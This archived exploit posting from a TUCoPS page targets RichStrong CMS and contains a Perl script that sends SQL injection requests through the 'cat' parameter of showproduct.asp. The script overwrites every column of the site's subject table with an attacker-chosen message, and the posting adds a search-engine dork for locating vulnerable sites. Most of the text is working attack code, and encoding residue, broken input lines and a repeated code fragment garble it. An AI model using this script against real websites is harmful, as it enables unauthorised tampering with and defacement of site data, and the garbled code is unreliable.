TUCoPS :: Web :: CMS / Portals

TUCoPS :: Web :: CMS / Portals :: bx1472.htm
RichStrong CMS (showproduct.asp?cat=) Remote SQL Injection Exploit

RichStrong CMS (showproduct.asp?cat=) Remote SQL Injection Exploit RichStrong CMS (showproduct.asp?cat=) Remote SQL Injection Exploit


[+] Info:=0D
=0D
[~] Software: RichStrong CMS=0D
[~] HomePage: http://www.hzrich.cn=0D 
[~] Exploit: Remote Sql Injection [High]=0D
[~] Where: showproduct.asp?cat==0D
[~] Bug Found By: Jose Luis G=F3ngora Fern=E1ndez|JosS=0D
[~] Contact: sys-project[at]hotmail.com=0D
[~] Web: http://www.spanish-hackers.com=0D 
[~] Dork: "Power by:RichStrong CMS"=0D
[~] Dork2: Priv8, xD!=0D
=0D
[+] Tables:=0D
=0D
[*] Table 1: subject=0D
=0D
[+] Columns:=0D
=0D
[*] Column 1: id=0D
[*] Column 2: subjectname=0D
[*] Column 3: subjecttype=0D
[*] Column 4: displayorder=0D
[*] Column 5: description=0D
[*] Column 6: layout=0D
[*] Column 7: style=0D
[*] Column 8: category=0D
[*] Column 9: workflowID_R=0D
[*] Column 10: workflowID_S=0D
[*] Column 11: status=0D
[*] Column 12: owner=0D
[*] Column 13: isinherit=0D
[*] Column 14: doclistcount=0D
[*] Column 15: docstyle=0D
[*] Column 16: docsecrettype=0D
[*] Column 17: docpubdays=0D
[*] Column 18: wwwname=0D
[*] Column 19: logo=0D
[*] Column 20: contactus=0D
=0D
[+] Exploit:=0D
=0D
=0D
#!/usr/bin/perl=0D
=0D
# RichStrong CMS - Remote SQL Injection Exploit=0D
# Code by JosS=0D
# Contact: sys-project[at]hotmail.com=0D
# Spanish Hackers Team=0D
# www.spanish-hackers.com=0D 
=0D
use IO::Socket::INET;=0D
use LWP::UserAgent;=0D
use HTTP::Request;=0D
use LWP::Simple;=0D
=0D
sub lw=0D
{=0D
=0D
my $SO = $^O;=0D
my $linux = "";=0D
if (index(lc($SO),"win")!=-1){=0D
		   $linux="0";=0D
	    }else{=0D
		    $linux="1";=0D
	    }=0D
		if($linux){=0D
system("clear");=0D
}=0D
else{=0D
system("cls");=0D
system ("title RichStrong CMS - Remote SQL Injection Exploit - By JosS");=0D
system ("color 02");=0D
}=0D
=0D
}=0D
=0D
#*************************** expl ******************************=0D
=0D
=0D
&lw;=0D
=0D
print "\t\t########################################################\n\n";=0D
print "\t\t#    RichStrong CMS - Remote SQL Injection Exploit     #\n\n";=0D
print "\t\t#                        by JosS                       #\n\n";=0D
print "\t\t########################################################\n\n";=0D
=0D
print "Url Victim (Ex: www.localhost/showproduct.asp?cat=): ";=0D 
$host=;=0D
chomp $host;=0D
print "\n";=0D
=0D
  if ( $host   !~   /^http:/ ) {=0D
=0D
    # lo a=F1adimos=0D
$host = 'http://' . $host;=0D 
}=0D
=0D
=0D
print "Message: ";=0D
$message=;=0D
chomp $message;=0D
print "\n";=0D
=0D
@columnas=("id","subjectname","subjecttype","displayorder","description","layout","style","category","workflowID_R","workflowID_S","status","owner",=0D
"isinherit","doclistcount","docstyle","docsecrettype","docpubdays","wwwname","logo","contactus");=0D
=0D
=0D
for ($i=0;$i<=21;$i++)=0D
=0D
{=0D
=0D
$comando="'%20update%20subject%20set%20$columnas[$i]='$message'--";=0D
$comando =~ s/ /+/g;=0D
=0D
my $final = $host.$comando;=0D
my $ua = LWP::UserAgent->new;=0D
my $req = HTTP::Request->new(GET => $final);=0D
$doc = $ua->request($req)->as_string;=0D
=0D
print "update: $columnas[$i]\n";=0D
=0D
}=0D

$message'--";=0D $comando =~ s/ /+/g;=0D =0D my $final = $host.$comando;=0D my $ua = LWP::UserAgent->new;=0D my $req = HTTP::Request->new(GET => $final);=0D $doc = $ua->request($req)->as_string;=0D =0D print "update: $columnas[$i]\n";=0D =0D }=0D